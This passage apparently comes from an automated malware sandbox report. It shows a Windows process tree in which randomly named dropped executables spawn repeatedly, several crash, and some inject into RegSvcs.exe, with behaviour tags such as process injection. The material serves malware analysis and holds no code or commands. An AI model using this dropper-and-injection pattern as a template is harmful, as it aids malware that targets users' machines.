- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10820
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11216
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10400
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10632
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10948
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10264
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4440
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10936
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11148
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1208
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8344
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9040
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7520
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10104
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4340
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2712
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3228
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4296
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7508
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9084
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9092
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1928
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8460
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4700
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9324
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10752
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3604
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2636
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10420
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9580
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8860
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9828
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4960
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2424
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11092
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11480
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11948
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8296
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11964 -s 28
      4⤵
      Program crash
      PID:11572
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9436
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7148
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7304
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12340
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12716
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13132
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12536
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13220
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13020
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13672
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:14268
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:14196
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13556
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:14052
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9328
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6300
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3348
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15464
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15992
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12752
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15900
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8608
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3976
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12952
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9860
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15140
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11660
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10176
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13828
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:16368
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:16576
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4760
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13852
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15340
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15296
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17332
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:14044
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:16388
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13896
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12136
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17428
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17848
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18388
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17160
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:16780
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17304
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2600
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:12912
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9632
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18844
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15192
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:19856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 19856 -s 28
      4⤵
      Program crash
      PID:20020
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:20332
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17968
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:19588
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18480
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:16904
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8644
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:13768
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1184
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18152
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10428
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18600
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17740
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:20776
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:21312
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:18688
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:19592
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:17012
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:22260
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:23224
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:11584
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6372
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:15676
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:23460
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:22892
- C:\Users\Admin\Documents\sJvdyp5tPyqaf3ycg5DblcPl.exe
  "C:\Users\Admin\Documents\sJvdyp5tPyqaf3ycg5DblcPl.exe"
  2⤵
  PID:4856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 276
    3⤵
    - Drops file in Windows directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- C:\Users\Admin\Documents\nP1C_KI4iAQan_hXudLtr9p8.exe
  "C:\Users\Admin\Documents\nP1C_KI4iAQan_hXudLtr9p8.exe"
  2⤵
  - Executes dropped EXE
  PID:4560
- - C:\Users\Admin\Documents\nP1C_KI4iAQan_hXudLtr9p8.exe
    "C:\Users\Admin\Documents\nP1C_KI4iAQan_hXudLtr9p8.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5892
- C:\Users\Admin\Documents\NA0oDpuHQ73ryPChla5AmKoC.exe
  "C:\Users\Admin\Documents\NA0oDpuHQ73ryPChla5AmKoC.exe"
  2⤵
  - Executes dropped EXE
  PID:4564
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 288
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5384
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"
    3⤵
    - Suspicious use of SetThreadContext
    PID:5708
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:1528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 288
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:6572
- C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
  "C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1708
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:4408
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:5164
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:5780
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:5240
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:1288
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:1668
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:576
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:2928
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    - Executes dropped EXE
    PID:4516
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:3572
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:5432
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4296
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:1552
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:4376
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6492
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
    3⤵
    PID:6772
- - C:\Users\Admin\Documents\DgSBWhglxTYBqlBAtGfXu_mK.exe
